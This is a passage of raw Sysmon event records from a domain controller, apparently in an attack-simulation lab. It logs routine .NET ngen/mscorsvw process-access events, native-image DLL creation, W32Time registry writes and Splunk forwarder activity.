21:03:49.549{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x000f1c78) 13241300x800000000000000020304Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:03:49.549{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7686a-0xe17f73ce) 13241300x800000000000000020303Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:03:49.549{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d76873-0x4343dbce) 13241300x800000000000000020302Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:03:49.549{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7687b-0xa50843ce) 10341000x800000000000000020301Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:49.378{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B5-60D3-6403-00000000CF01}5356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020300Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:49.362{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1B5-60D3-6403-00000000CF01}5356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020299Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:49.362{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B5-60D3-6403-00000000CF01}5356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020298Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:49.299{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B5-60D3-6303-00000000CF01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020297Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:49.284{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1B5-60D3-6303-00000000CF01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020296Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:49.268{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B5-60D3-6303-00000000CF01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020295Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:49.253{4DB9351A-A1B5-60D3-6203-00000000CF01}2536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\9e8-0\Microsoft.CertificateServices.Setup.Interop.dll2021-06-23 21:03:49.253 354300x800000000000000020294Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:48.214{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61418-false10.0.1.12-8000- 10341000x800000000000000020293Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:49.206{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B5-60D3-6203-00000000CF01}2536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020292Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:49.190{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1B5-60D3-6203-00000000CF01}2536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020291Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:49.190{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B5-60D3-6203-00000000CF01}2536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020290Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:49.159{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B5-60D3-6103-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020289Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:49.128{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1B5-60D3-6103-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020288Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:49.128{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B5-60D3-6103-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020287Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:49.081{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B712825D2001DD6F47E967240B4A0FE2,SHA256=83F1161116489C404A992C7CE463D650638A9467A42D1A0940507E9F2C41AA4B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000020286Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:49.065{4DB9351A-A1B4-60D3-6003-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1ad0-0\Microsoft.CertificateServices.ServerManager.DeploymentPlugIn.dll2021-06-23 21:03:49.065 10341000x800000000000000020328Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:50.909{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B6-60D3-6803-00000000CF01}7096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020327Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:50.893{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1B6-60D3-6803-00000000CF01}7096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020326Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:50.893{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B6-60D3-6803-00000000CF01}7096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020325Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:50.799{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B6-60D3-6703-00000000CF01}6540C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020324Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:50.784{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1B6-60D3-6703-00000000CF01}6540C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020323Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:50.784{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B6-60D3-6703-00000000CF01}6540C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020322Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:50.753{4DB9351A-A1B6-60D3-6603-00000000CF01}7024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b70-0\Microsoft.Dtc.PowerShell.dll2021-06-23 21:03:50.753 10341000x800000000000000020321Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:50.643{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B6-60D3-6603-00000000CF01}7024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020320Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:50.628{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1B6-60D3-6603-00000000CF01}7024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020319Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:50.628{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B6-60D3-6603-00000000CF01}7024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\